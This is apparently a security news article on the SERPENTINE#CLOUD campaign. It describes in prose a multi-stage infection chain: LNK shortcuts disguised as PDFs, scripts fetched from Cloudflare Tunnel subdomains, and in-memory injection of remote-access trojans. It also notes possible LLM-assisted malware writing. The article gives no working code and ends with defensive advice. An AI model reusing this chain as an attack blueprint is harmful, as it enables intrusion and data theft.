You Just Clicked a File — and Something Woke Up in RAM That Shouldn’t Be There
A batch file whispered to a script, a shortcut disguised itself as a document, and Cloudflare saw nothing suspicious.A new malicious campaign, dubbed SERPENTINE#CLOUD, is leveraging Cloudflare Tunnel subdomains to deliver malware via phishing email attachments. The multi-stage attack was uncovered by Securonix, with activity observed across the U.S., UK, Germany, and several countries in Europe and Asia.
Stage 1: Phishing & Deception
The attack begins with mass phishing emails — typically themed around invoices or payment notices. Attached is a ZIP archive containing a Windows LNK shortcut, cleverly disguised as a PDF document. Once opened, this shortcut triggers a script download from a WebDAV server hosted on a Cloudflare Tunnel subdomain. This abuse of a trusted cloud service enables stealthy delivery by bypassing domain filtering protections.
Stage 2: Script Execution
The downloaded WSF (Windows Script File) is executed via cscript.exe and written in VBScript. It fetches and runs an external batch file (kiki.bat), again from a Cloudflare subdomain. To mislead the user, a fake PDF opens, while in the background:- The batch script performs AV checks
- Downloads a Python-based loader for the next payload
Stage 3: Memory Injection
In the final stage, a Python loader is used to inject shellcode into memory. This code is packed using Donut, a known open-source tool for in-memory injection. Identified payloads include:- AsyncRAT
- Revenge RAT
- GuLoader
- Remcos
- XWorm
- Venom RAT
- PureLogs Stealer
Obfuscation Tactics
Researchers highlight a shift in initial infection vectors: older campaigns used .URL files; now, LNK files are preferred, disguised as documents. These shortcuts trigger the download process via WebDAV on subdomains like:css
КопироватьРедактировать
*.trycloudflare[.]com
— making traffic appear legitimate and encrypted.
Also notable: both batch and VBScript files include detailed code comments, suggesting potential use of language models (LLMs) to generate the malware logic — a hint at AI-assisted development.
Key Threat Features
- Social engineering + living-off-the-land binaries (LOLBins)
- Stealth execution entirely in RAM
- Cloudflare Tunnel as C2 replacement for stealthy command delivery
- No traditional indicators: no dropped executables, no obvious domains
Active & Evolving Threat
Securonix warns that SERPENTINE#CLOUD is ongoing, with potential for expansion and adaptation. The operators demonstrate a strong command of English, but their identity remains unknown.Organizations are advised to monitor Cloudflare Tunnel traffic, inspect LNK files carefully, and enhance defenses around script-based and memory-resident threats.
